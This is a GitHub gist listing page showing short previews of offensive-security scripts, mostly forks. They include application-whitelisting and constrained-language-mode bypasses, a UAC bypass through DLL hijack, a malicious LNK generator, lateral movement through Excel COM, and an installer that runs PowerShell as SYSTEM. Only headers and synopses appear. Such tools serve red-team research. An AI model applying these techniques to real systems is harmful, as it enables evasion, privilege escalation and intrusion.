xenoscr
/ regsvcs.cs
Created
October 2, 2017 16:17
Application Whiltelisting Bypass - regsvcs/regasm
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Create Your Strong Name Key -> key.snk |
xenoscr
/ file.rsp
Created
October 2, 2017 16:57
— forked from NickTyrer/file.rsp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REGSVR odbcconf.dll |
xenoscr
/ Invoke-ExcelMacroPivot.ps1
Created
November 1, 2017 01:50
— forked from enigma0x3/Invoke-ExcelMacroPivot.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ExcelMacroPivot{ | |
| <# | |
| .AUTHOR | |
| Matt Nelson (@enigma0x3) | |
| .SYNOPSIS | |
| Pivots to a remote host by using an Excel macro and Excel's COM object | |
| .PARAMETER Target | |
| Remote host to pivot to | |
| .PARAMETER RemoteDocumentPath | |
| Local path on the remote host where the payload resides |
xenoscr
/ Create-LNK.ps1
Created
November 1, 2017 01:55
— forked from enigma0x3/Create-LNK.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-LNKPayload{ | |
| <# | |
| .SYNOPSIS | |
| Generates a malicous LNK file | |
| .PARAMETER LNKName | |
| Name of the LNK file you want to create. |
xenoscr
/ UACBypass.ps1
Created
November 1, 2017 01:56
— forked from enigma0x3/UACBypass.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-UACBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
| Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
xenoscr
/ RunscripthelperBypass.ps1
Created
November 2, 2017 21:49
— forked from mattifestation/RunscripthelperBypass.ps1
PowerShell weaponization for the runscripthelper.exe constrained language mode bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-RunScriptHelperExpression { | |
| <# | |
| .SYNOPSIS | |
| Executes PowerShell code in full language mode in the context of runscripthelper.exe. | |
| .DESCRIPTION | |
| Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode. |
xenoscr
/ get_gists.py
Created
November 3, 2017 01:58
— forked from leoloobeek/get_gists.py
Download all gists for a specific user
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # first: mkdir user && cd user && cp /path/to/get_gists.py . | |
| # python3 get_gists.py user | |
| import requests | |
| import sys | |
| from subprocess import call | |
| user = sys.argv[1] | |
| r = requests.get('https://api.github.com/users/{0}/gists'.format(user)) |
xenoscr
/ DataDrivenTest.wsc
Created
November 7, 2017 10:52
— forked from N3mes1s/DataDrivenTest.wsc
Authoring Tests in Scripting Languages
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" ?> | |
| <!-- Te.exe DataDrivenTest.wsc --> | |
| <!-- C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF > ./TE.exe DataDrivenTest.wsc --> | |
| <!-- Test Authoring and Execution Framework v5.8k for x64 --> | |
| <!-- StartGroup: VBSampleTests::TestOne --> | |
| <!-- Calling TestOne --> | |
| <!-- EndGroup: VBSampleTests::TestOne [Passed] --> | |
| <!-- Summary: Total=1, Passed=1, Failed=0, Blocked=0, Not Run=0, Skipped=0 --> | |
| <?component error="true" debug="true"?> | |
| <package> |
xenoscr
/ Whitelisting.txt
Created
November 21, 2017 04:05
MITRE ATT&CK Mapped Against Whitelisting Defense
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| T1103 - AppInitDlls | |
| T1017 - Application Deployment Software | |
| T1131 - Authentication Package | |
| T1009 - Binary Padding | |
| T1042 - Change Default Association | |
| T1116 - Code Signing | |
| T1122 - Component Object Model Hijacking | |
| T1003 - Credential Access | |
| T1055 - DLL Injection | |
| T1038 - DLL Search Order Hijacking |
xenoscr
/ msigen.wix
Created
November 22, 2017 10:52
— forked from xpn/msigen.wix
WIX file with embedded Powershell, which will be executed as SYSTEM
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi"> | |
| <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033"> | |
| <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/> | |
| <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/> | |
| <Directory Id="TARGETDIR" Name="SourceDir"> | |
| <Directory Id="ProgramFilesFolder"> | |
| <Directory Id="INSTALLLOCATION" Name="Example"> | |
| <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222"> |
OlderNewer